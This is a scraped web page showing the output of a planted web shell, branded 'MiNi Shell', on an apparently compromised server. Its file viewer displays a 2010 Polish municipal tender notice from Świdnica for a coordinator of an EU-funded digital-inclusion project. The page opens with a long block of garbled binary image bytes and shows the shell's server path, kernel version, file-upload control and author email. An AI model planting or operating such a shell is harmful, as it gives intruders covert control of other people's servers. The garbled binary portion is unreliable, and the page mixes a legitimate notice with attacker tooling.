JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100223/50588-N-2010.html

<p class="kh_header"><b>Świdnica: Wybór Koordynatora Projektu Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion w Gminie Miasto Świdnica współfinansowanego ze środków UE- Program Operacyjny Innowacyjna Gospodarka, 8. Oś priorytetowa: Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki, Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion</b><br>
<b>Numer ogłoszenia: 50588 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Koordynatora Projektu Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion w Gminie Miasto Świdnica współfinansowanego ze środków UE- Program Operacyjny Innowacyjna Gospodarka, 8. Oś priorytetowa: Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki, Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji koordynatora projektu pn.: Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion w Gminie Miasto Świdnica, zwanych dalej odpowiednio Koordynatorem i Projektem. 
Celem Projektu jest przeciwdziałanie wykluczeniu społecznemu poprzez zapewnienie sprzętu komputerowego wraz z możliwością dostępu do Internetu dla mieszkańców Gminy Miasto Świdnica, którzy ze względu na niskie dochody i/lub niepełnosprawność są zagrożeni wykluczeniem cyfrowym, a skutkiem tego marginalizacją społeczną. 
Informacje nt. Projektu
Okres realizacji Projektu 3 lata. Liczba BO - 167 gospodarstw domowych, które zostaną wyposażone w komputery stacjonarne z oprogramowaniem oraz dostęp do szerokopasmowego Internetu. Szacunkowa wartość całego Projektu wynosi ok. 1.300.000,00 zł. Szacunkowa wartość zamówienia wynosi ok. 60.000,00 zł. 
	Zakres rzeczowy Projektu obejmuje:
1) zakup komputerów stacjonarnych z systemem operacyjnym, zakup pakietów biurowych z licencją dla użytkowników domowych, zakup programów filtrujących i ich aktualizacje, zapewnienie serwisowania sprzętu, (konfiguracja sprzętu i parametry do ustalenia) - w trybie przetargu nieograniczonego,
2) zakup usług dostawy Internetu - aktywacje łączy internetowych dla 167 gospodarstw domowych wraz z miesięcznymi płatnościami za łącze - w trybie przetargu nieograniczonego, 


3) zorganizowanie ośmiu szkoleń komputerowych, każde po 25 godz. (8 grup po 10 osób razem  80 osób) - w trybie przetargu nieograniczonego, 
4) promocję Projektu: 6 artykułów w prasie, oznaczenie sprzętu nalepkami informacyjnymi, podkładki pod mysz z logo, zakup Pen Drive z logo, 
5) utworzenie i zapewnienie funkcjonowania zespołu realizującego Projekt, składającego się z: koordynatora, inspektora ds. finansowo-księgowych, inspektora ds. zamówień publicznych, inspektora ds. informatyki, 
6) zakupy artykułów biurowych, 
7) ubezpieczenie sprzętu komputerowego. 
	Przy wyłanianiu dostawców usług, sprzętu, artykułów objętych ww. zakresem rzeczowym niezbędne jest przestrzeganie procedur prawa zamówień publicznych i wytycznych odnośnie kwalifikowalności wydatków przewidzianych w Projekcie, ustalonych przez Władzę Wdrażającą Programy Europejskie. 
	Wniosek aplikacyjny nr POIG 08.03.00-02-023/09 Gminy Miasto Świdnica do konkursu o dofinansowanie w ramach Programu Operacyjnego Innowacyjna Gospodarka, 8. Oś priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion, dostępny jest do wglądu w Urzędzie Miejskim w Świdnicy ul. Armii Krajowej 49, pok. 108 w godz. 8-15 w dni robocze do 23 lutego 2010 r. 
	Koordynator jest zobowiązany do realizacji Projektu Gminy Miasto Świdnica zgodnie z umową o dofinansowanie zawartą w oparciu o wniosek jw., w tym m.in.:
- prowadzenia Projektu, jego terminowego wdrożenia i bieżącej realizacji, 
- kierowania i koordynowania pracami członków zespołu zarządzającego (inspektora ds. finansowo-księgowych, inspektora ds. zamówień publicznych, inspektora ds. informatyki, wskazanych przez Zamawiającego,
- uczestniczenia w przetargach na dostawy i usługi, inwentaryzacjach i kontrolach sprzętu u BO, 
- organizacja i nadzór nad przekazywaniem komputerów i dostawą szerokopasmowego Internetu dla BO,
- przygotowania, zawarcia, bieżącej realizacji i rozliczania umów użyczenia sprzętu komputerowego dla BO, 
- bieżącej korespondencji, kontaktów z Władzą Wdrażającą, sporządzania wniosków o płatności w aktualnej wersji generatora wraz z załącznikami oraz w wersji papierowej i sprawozdawczości z realizacji, przygotowywania ewentualnych propozycji zmian harmonogramu rzeczowo-finansowego w przypadku takiej konieczności, rozliczeń okresowych i rozliczenia końcowego Projektu,
- udzielania wyjaśnień w zakresie realizacji Projektu oraz bezpośredniej współpracy z instytucjami przeprowadzającymi kontrole, w tym umożliwianie im nieograniczonego dostępu do pomieszczeń i terenów na których realizowany jest lub był Projekt, oraz dostępu do systemu teleinformatycznego i wszystkich dokumentów elektronicznych związanych z zarządzaniem Projektem; po rozliczeniu Projektu Koordynator przekaże Zamawiającemu wszystkie dokumenty związane z realizacją Projektu w wersji papierowej i elektronicznej - na CD oraz e-mailem, 
- wykonywania wszystkich czynności i prac w bieżącej i osobistej współpracy z odpowiednimi merytorycznymi komórkami organizacyjnymi Urzędu Miejskiego w Świdnicy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. a)	ukończenie studiów wyższych o specjalności prawo lub zarządzanie,
b)	doświadczenie w kierowaniu zespołem pracowników przez minimum 3 lata,
c)	posiadanie minimum 5-letniego stażu pracy w instytucjach realizujących projekty unijne, które w ostatnich 6-ciu miesiącach przed złożeniem oferty, złożyły conajmniej jeden wniosek aplikacyjny,
d)	ukończenie kursów/szkoleń w zakresie:
-	funduszy Unii Europejskiej,
-	prawa zamówień publicznych,
-	ochrony danych osobowych;
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie treści złożonych oświadczeń i dokumentów, według formuły:
 SPEŁNIA - NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj.:
	zapewnienie obecności osoby wskazanej do realizacji zadania w siedzibie Zamawiającego conajmniej 3 dni w tygodniu w godzinach pracy Zamawiającego tj. w godz. 7:30-15:30.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>ad. 1) oświadczenie o spełnianiu warunków  (na Załączniku nr 2 do oferty - wzór w załączeniu),
ad. 2a) dyplom uczelni wyższej  (Załącznik nr 3 do oferty),



ad. 2b) świadectwa pracy, zaświadczenia potwierdzające doświadczenie w kierowaniu zespołem pracowników przez minimum 3 lata (Załącznik nr 4 do oferty),
ad. 2c) zaświadczenia z zakładu pracy, referencje potwierdzające posiadanie min. 5-letniego stażu pracy w instytucjach realizujących projekty unijne, które w ostatnich 6-ciu miesiącach przed złożeniem oferty, złożyły co najmniej jeden wniosek aplikacyjny (Załącznik nr 5 do oferty),
ad. 2d) zaświadczenia lub certyfikaty itp. potwierdzające ukończenie kursów/szkoleń z zakresu:
	- funduszy Unii Europejskiej  (Załącznik nr 6 do oferty),
	- prawa zamówień publicznych  (Załącznik nr 7 do oferty),
	- ochrony danych osobowych  (Załącznik nr 8 do oferty),
ad. 3) oświadczenie o zapewnieniu obecności osoby wskazanej do realizacji zadania w siedzibie Zamawiającego co najmniej 3 dni w tygodniu w godzinach pracy Zamawiającego, tj. w godz. 7:30-15:30 (Załącznik nr 9 do oferty - wzór w załączeniu),
ad. 4) oświadczenie o spełnianiu warunków znajdowania się w sytuacji ekonomicznej i finansowej 
 zapewniającej realizację Projektu (Załącznik nr 10 do oferty - wzór w załączeniu).
- druk zgłoszenia w przypadku osoby fizycznej nieprowadzącej działalności gospodarczej (Załącznik nr 1a do oferty - wzór w załączeniu),
- Oświadczenie, iż przed przystąpieniem do przetargu osoba/firma zapoznała się z warunkami realizacji zadania określonymi w SIWZ i formularzu umowy oraz, że uwzględniła je w ofercie i przyjmuje je bez zastrzeżeń 	- (Załącznik nr 15 do oferty - wzór w załączeniu).

- Oświadczenie dot. wymaganego okresu związania ofertą - 30 dni (Załącznik nr 16 do oferty - wzór w załączeniu).

- Zaparafowany projekt umowy  - załącznik nr 2 do SIWZ (a jednocześnie Załącznik nr 17 do oferty).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, Miejskie Biuro Przetargów pok. 124 (I p.).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, Miejskie Biuro Przetargów pok. 124 (I p.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion w Gminie Miasto Świdnica współfinansowany ze środków UE- Program Operacyjny Innowacyjna Gospodarka, 8. Oś priorytetowa: Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki, Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com